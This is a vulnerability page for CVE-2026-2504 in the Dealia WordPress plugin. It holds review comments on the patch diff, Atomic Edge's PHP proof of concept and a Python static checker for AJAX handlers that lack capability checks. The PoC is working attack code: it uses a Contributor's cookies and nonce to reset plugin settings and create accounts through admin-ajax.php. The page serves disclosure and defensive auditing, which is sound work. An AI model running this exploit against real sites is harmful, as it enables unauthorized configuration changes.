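Review bot: `<?php wp_kses( $dealia_all_products_enabled_val, []); ?>` outputs nothing: wp_kses() returns the filtered string instead of echoing it, so this hidden input is always rendered with value="" whatever the flag is. The bug predates the rename, but the hunk touches the line; since the value is already coerced to 0/1 two lines above, `value="<?php echo (int) $dealia_all_products_enabled_val; ?>"` (or the plugin's own `dealia_escape_echo()`) is what was intended.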
@@ -30,8 +30,8 @@
                 type="checkbox"
                 name="dealia_is_active"
                 value="1"
-                <?php if($current_form_id !== 0 || $all_products_enabled): ?> checked="checked" <?php endif; ?>
-                <?php if($all_products_enabled): ?> disabled="disabled" <?php endif; ?>
+                <?php if($dealia_current_form_id !== 0 || $dealia_all_products_enabled): ?> checked="checked" <?php endif; ?>
+                <?php if($dealia_all_products_enabled): ?> disabled="disabled" <?php endif; ?>
             />
             <label for="dealia-field-dealia_active" class="dealia-field-label">
                 <?php esc_attr_e('Active', 'dealia-request-a-quote'); ?>:
@@ -42,9 +42,9 @@
                 <?php esc_attr_e('Form', 'dealia-request-a-quote'); ?>:
             </label>
             <select id="dealia-field-dealia_forms" name="dealia_forms" class="dealia-product-forms">
-                <?php foreach ($forms as $form): ?>
-                    <option <?php if($current_form_id === $form['id']): ?> selected <?php endif; ?> value="<?php dealia_escape_echo( $form['id'] ); ?>">
-                        <?php dealia_escape_echo( $form['name'] ); ?>
+                <?php foreach ($dealia_forms as $dealia_form): ?>
+                    <option <?php if($dealia_current_form_id === $dealia_form['id']): ?> selected <?php endif; ?> value="<?php dealia_escape_echo( $dealia_form['id'] ); ?>">
+                        <?php dealia_escape_echo( $dealia_form['name'] ); ?>
                     </option>
                 <?php endforeach; ?>
             </select>
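Review bot: `$dealia_current_form_id === $dealia_form['id']` is a strict comparison while the default assigned above is the integer 0; if `$dealia_form['id']` arrives as a string (for example from decoded JSON) no option will ever be marked selected. Either cast both sides to int or use the same type on both ends of the comparison.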

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-2504 - Dealia – Request a quote <= 1.0.7 - Missing Authorization to Authenticated (Contributor+) Plugin Configuration Reset

/**
 * Proof of Concept for CVE-2026-2504
 * Requires WordPress authentication cookies for a Contributor (or higher) account.
 *
 * The vulnerable AJAX handlers verify a nonce for the DEALIA_ADMIN_NONCE action
 * but never call current_user_can( 'manage_options' ). A Contributor receives a
 * valid token for that action in the script localized into the post edit screen
 * and can then reach every handler that relies on the nonce alone.
 */

$target_url = 'https://vulnerable-wordpress-site.com';

// Value sent as _wpnonce. This must be the token produced by
// wp_create_nonce( DEALIA_ADMIN_NONCE ) for the Contributor's own session,
// copied from the localized script on the post edit screen; WordPress nonces
// are bound to the user and time-limited, so they cannot be hard-coded. The
// constant DEALIA_ADMIN_NONCE itself ('nonce_Y7deR0HjpErwQn' in <= 1.0.7) is
// only the nonce action name and will not pass wp_verify_nonce().
$admin_nonce = 'PASTE_HARVESTED_NONCE_TOKEN_HERE';

// Authentication cookies of the Contributor session (replace with real values)
$cookies = 'wordpress_logged_in_xxx=xxx; wordpress_sec_xxx=xxx;';

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_TIMEOUT, 30);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_COOKIE, $cookies);
// Certificate checks are disabled only so the PoC runs against a lab target
// with a self-signed certificate; never do this outside a test environment.
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);

/**
 * POST one admin-ajax action and print the result. admin-ajax.php answers
 * with a bare "-1" or "0" (not JSON) when the nonce check fails or the action
 * is unknown, so the raw body is printed whenever the response does not decode.
 */
function send_ajax($ch, string $label, array $payload): void
{
    echo "Attempting $label...\n";
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($payload));
    $response  = curl_exec($ch);
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    if ($response === false) {
        echo "cURL error: " . curl_error($ch) . "\n\n";
        return;
    }
    echo ucfirst($label) . " response (HTTP $http_code): ";
    $decoded = json_decode($response, true);
    if ($decoded === null) {
        echo trim($response) . "\n\n";
    } else {
        print_r($decoded);
        echo "\n\n";
    }
}

// Method 1: Reset plugin configuration (most impactful: the handler calls
// delete_option( 'dealia_options' ) and wipes the plugin's settings)
send_ajax($ch, 'plugin configuration reset', [
    'action'   => 'dealia_ajax_reset',
    '_wpnonce' => $admin_nonce,
]);

// Method 2: Attempt login to the external Dealia service with attacker credentials
send_ajax($ch, 'Dealia service login', [
    'action'   => 'dealia_ajax_login',
    '_wpnonce' => $admin_nonce,
    'email'    => 'attacker@example.com',
    'password' => 'password123',
]);

// Method 3: Create a new Dealia account from the victim site
send_ajax($ch, 'Dealia account creation', [
    'action'       => 'dealia_ajax_manage_account',
    '_wpnonce'     => $admin_nonce,
    'email'        => 'attacker@example.com',
    'password'     => 'password123',
    'first_name'   => 'Attacker',
    'last_name'    => 'Name',
    'company_name' => 'Malicious Corp',
    'country'      => 'US',
]);

curl_close($ch);
?>
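To turn the pattern the PoC abuses into something a reviewer can run over a plugin tree, here is an added example in Python (written for this page; it is not Atomic Edge's PoC and not the plugin's code): a small static check that pairs each `wp_ajax_*` hook with its handler body and flags handlers that gate on a nonce only, never on a capability. The embedded PHP is a constructed sample: its action names come from the advisory, the function bodies and the class name `Dealia_Admin_Settings` are assumptions written for the example, and the `check_ajax_referer( 'dealia_admin_nonce', 'dealia_nonce' )` pairing mirrors the `wp_nonce_field()` call in the patch's main-page.php hunk rather than a verified line of the plugin.

```python
import re

# Constructed sample of the two handler shapes the advisory contrasts. Action names
# are from the advisory; bodies and the class are assumptions, not plugin code.
SAMPLE_PHP = r"""<?php
add_action( 'wp_ajax_dealia_ajax_reset', 'dealia_ajax_reset' );
add_action( 'wp_ajax_dealia_ajax_refresh', 'dealia_ajax_refresh' );
add_action( 'wp_ajax_nopriv_dealia_public_form', 'dealia_public_form' );

// Vulnerable shape: the CSRF token is checked, the capability never is.
function dealia_ajax_reset() {
    if ( ! wp_verify_nonce( $_POST['_wpnonce'], DEALIA_ADMIN_NONCE ) ) {
        wp_send_json_error( 'bad nonce' );
    }
    delete_option( 'dealia_options' );
    wp_send_json_success();
}
// Hardened shape: nonce AND capability check before the privileged action.
function dealia_ajax_refresh() {
    check_ajax_referer( 'dealia_admin_nonce', 'dealia_nonce' );
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }
    wp_send_json_success( get_option( 'dealia_options' ) );
}
// Public by design (nopriv); not an authorization finding.
function dealia_public_form() { wp_send_json_success(); }

class Dealia_Admin_Settings {
    public function __construct() {
        add_action( 'wp_ajax_dealia_save_additional_settings', [ $this, 'save_additional_settings' ] );
    }
    // Vulnerable shape again, registered as a method via [ $this, 'method' ].
    public function save_additional_settings() {
        check_ajax_referer( 'dealia_admin_nonce', 'dealia_nonce' );
        update_option( 'dealia_options', $_POST['options'] );
        wp_send_json_success();
    }
}
"""

# add_action( 'wp_ajax_[nopriv_]<action>', 'func' | [ $obj, 'method' ] | array( $obj, 'method' ) )
CALLBACK = r"""(?:['"](?P<fn>\w+)['"]|(?:\[|array\()\s*\$\w+\s*,\s*['"](?P<method>\w+)['"]\s*[\]\)])"""
AJAX_HOOK = re.compile(
    r"""add_action\(\s*['"]wp_ajax_(?P<nopriv>nopriv_)?(?P<action>\w+)['"]\s*,\s*""" + CALLBACK
)
NONCE_CALLS = ("wp_verify_nonce", "check_ajax_referer", "check_admin_referer")
CAP_CALLS = ("current_user_can", "is_super_admin")


def function_body(src: str, name: str):
    """Brace-delimited body of `function name(` (plain function or method), or None.
    Naive: takes the first definition with that name and ignores braces in strings."""
    m = re.search(r"function\s+" + re.escape(name) + r"\s*\(", src)
    if not m:
        return None
    start = src.find("{", m.end())
    if start == -1:
        return None
    depth = 0
    for i in range(start, len(src)):
        if src[i] == "{":
            depth += 1
        elif src[i] == "}":
            depth -= 1
            if depth == 0:
                return src[start:i + 1]
    return None


def audit_ajax_handlers(src: str):
    """One record per wp_ajax_* hook: does its handler check a nonce? a capability?"""
    findings = []
    for m in AJAX_HOOK.finditer(src):
        func = m.group("fn") or m.group("method")
        body = function_body(src, func)
        if body is None:
            continue
        findings.append({
            "action": m.group("action"),
            "function": func,
            "nopriv": m.group("nopriv") is not None,
            "nonce": any(c in body for c in NONCE_CALLS),
            "capability": any(c in body for c in CAP_CALLS),
        })
    return findings


def missing_authorization(src: str):
    """Actions any logged-in user can call (wp_ajax_*, not nopriv) whose handler never
    checks a capability: the CWE-862 shape in this advisory. A nonce alone does not
    count, since the token can be handed to lower-privileged users, as it was here."""
    return sorted(f["action"] for f in audit_ajax_handlers(src)
                  if not f["nopriv"] and not f["capability"])


if __name__ == "__main__":
    for f in audit_ajax_handlers(SAMPLE_PHP):
        print(f)
    print("missing authorization:", missing_authorization(SAMPLE_PHP))
```

Run it against a real plugin by feeding each PHP file's contents to `audit_ajax_handlers()`. The brace matcher ignores braces inside strings and comments and takes the first definition with the hooked name, so treat the output as a review queue to confirm by hand, not a verdict; handlers that reach a capability check only through a helper will show up as findings until you add that helper's name to `CAP_CALLS`.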
